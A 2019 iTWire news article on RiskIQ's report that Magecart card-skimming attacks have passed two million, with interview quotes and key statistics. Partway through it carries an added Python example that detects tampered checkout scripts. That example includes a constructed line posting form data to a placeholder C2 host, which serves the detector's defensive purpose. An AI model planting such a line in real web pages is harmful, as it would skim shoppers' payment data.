Security Market Segment LS
Monday, 07 October 2019 09:24

Magecart attacks have crossed 2m mark, RiskIQ claims

By Sam Varghese

Image by teguhjati pras from Pixabay

A cyber crime syndicate known as Magecart, which is made up of dozens of sub-groups that indulge in credit card theft by skimming online payment forms, has been found to be implicated in more than two million such attacks.

The security firm RiskIQ said, in a report released on Saturday, that among the 2,086,529 attacks, it had detected 18,000 hosts that were directly breached.

The report, titled MageCart: The State of a Growing Threat and written by the company's threat researchers Jordan Herman and Yonathan Klijnsma, said Magecart had been active for nearly a decade, with RiskIQ's first observation of it dating to 8 August 2010.

In reply to queries from iTWire, Herman said RiskIQ used the term Magecart as an umbrella term to describe a particular kind of cyber crime.

"[This is] the injection of skimmer code onto e-commerce websites with the intent of stealing credit card and other personal information," he said. "In the past, we limited this moniker to six discrete criminal groups, but, while we still track a number of specific groups carrying out this type of cyber crime, the proliferation of Magecart means that there are more persons involved in this activity than it is practical for us to enumerate."

[Graphic: Malvertisements and Magecart]

Asked to cite the reasons for the increase in Magecart attacks, Herman said there were several causative factors.

"Firstly, software development that takes security into consideration over sales timelines/goals is the exception, not the rule, and most software releases contain vulnerabilities that will need to be patched later," he said.

"This dynamic is exacerbated when a vendor is small and lacks resources for extensive QA or other security protections. Specific to the Magecart threat, we see this in the focus of some groups on attacking small third-party vendors as a means to gain access to larger, better-resourced organisations."

Herman said that secondly, it was often the case that types of cyber crime continued to proliferate, evolve, and increase for years after they were identified and became well known.

"For example, ransomware has been well known for years and several extremely widespread attacks have demonstrated the need to protect against it and mitigate its effects through security practices, such as proper back-up procedures, yet we continue to see devastating attacks against municipalities such as Baltimore.

[Graphic: Length of Magecart breach]

"That is to say, often attack vectors are developed and implemented by a few people. After the efficacy of the attack is demonstrated, other cyber criminals adopt it, alter it, and use it against new targets. With Magecart attacks, in particular, we have seen an evolution of skimming techniques over time."

Herman said at the moment one could observe a wide range of competence and targeting from different groups carrying out Magecart attacks.

"For example, the attacks on British Airways and Newegg were carried out by a group that specifically targeted these organisations, created bespoke skimmers and C2 domains for their attacks, and carried out those attacks with a high level of technical skill. In comparison, the recent attacks on open Amazon S3 buckets were carried out by a group that did no targeting and inserted their skimmer, which was a copy of another group’s skimmer, into any JS script found on an open bucket, demonstrating low levels of effort/skill."

He said while identifying attack vectors or techniques and disseminating that information was an important part of threat response, it was not enough.

"It is the responsibility of every organisation to work to protect themselves and their customers from these threats and to mitigate any potential effects of attacks that are successfully carried out. That is why RiskIQ works with our clients and other organisations we have seen affected by Magecart attacks (for instance, we worked with Amazon to help them identify open S3 Buckets and to communicate with the organisations that owned those buckets and get them closed and the skimmer code removed) to help them understand what happened, why, when, and how so that they can protect themselves in the future."

Asked whether it was safe to conclude that convenience was generally the enemy of security, with the former being sought by the tech industry at the expense of the latter, Herman responded: "As I mentioned above, software development that takes security into consideration over sales timelines/goals is the exception, not the rule, and most software releases contain vulnerabilities that will need to be patched later."

Some key points in the report:

  • Seventeen percent of all malvertisements detected by RiskIQ contain Magecart skimmers;
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely;
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts;
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains; and
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that's gone offline to assume access to these breached sites.
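Two findings above point at the same defensive control: skimmers were inserted into JavaScript served from open S3 buckets, and breaches last 22 days on average because nobody notices the change. The following is an added illustration, not code from RiskIQ or iTWire, of how a shop can detect that kind of tampering: it keeps a baseline hash of each deployed script and, when a served copy differs, flags any host the script now references that the shop never used before (the allowlist, script names and the placeholder C2 host are constructed assumptions).

```python
import hashlib
import re
from typing import Dict, List, Set

# Constructed example script, standing in for a shop's real checkout code.
CLEAN_CHECKOUT_JS = "document.querySelector('#pay').addEventListener('submit', validateCard);"

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

# Baseline recorded at deploy time: script name -> SHA-256 of its intended content.
BASELINE: Dict[str, str] = {"checkout.js": sha256_hex(CLEAN_CHECKOUT_JS)}

# Hosts the shop's front-end legitimately references (assumed for the example).
ALLOWED_HOSTS: Set[str] = {"shop.example", "cdn.shop.example"}

# Captures the host of every absolute http(s) URL embedded in a script.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def unknown_hosts(js: str) -> List[str]:
    """Hosts referenced by the script that are not on the allowlist."""
    found = {h.lower() for h in HOST_RE.findall(js)}
    return sorted(found - ALLOWED_HOSTS)

def check_script(name: str, js: str) -> Dict[str, object]:
    """Compare a served script with its baseline and flag skimmer-like changes.

    'modified' on its own may just be a legitimate redeploy; 'alert' means the
    change also introduced a host the shop never referenced, which is what a
    skimmer needs in order to send captured form data to its C2 domain.
    """
    modified = BASELINE.get(name) != sha256_hex(js)
    hosts = unknown_hosts(js) if modified else []
    return {"name": name, "modified": modified, "unknown_hosts": hosts, "alert": bool(hosts)}

if __name__ == "__main__":
    # Constructed tampered copy: the original plus a POST to a placeholder C2 host.
    tampered = CLEAN_CHECKOUT_JS + "fetch('https://c2.placeholder.invalid/c',{method:'POST'});"
    for label, js in [("clean", CLEAN_CHECKOUT_JS), ("tampered", tampered)]:
        print(label, check_script("checkout.js", js))
```

Running the check against each fetched copy of the site's scripts on a short schedule turns a breach that would otherwise sit unnoticed for weeks into an alert within minutes of the injection.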

The full report can be downloaded here after registration.

Graphics: courtesy RiskIQ


Sam Varghese


Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.
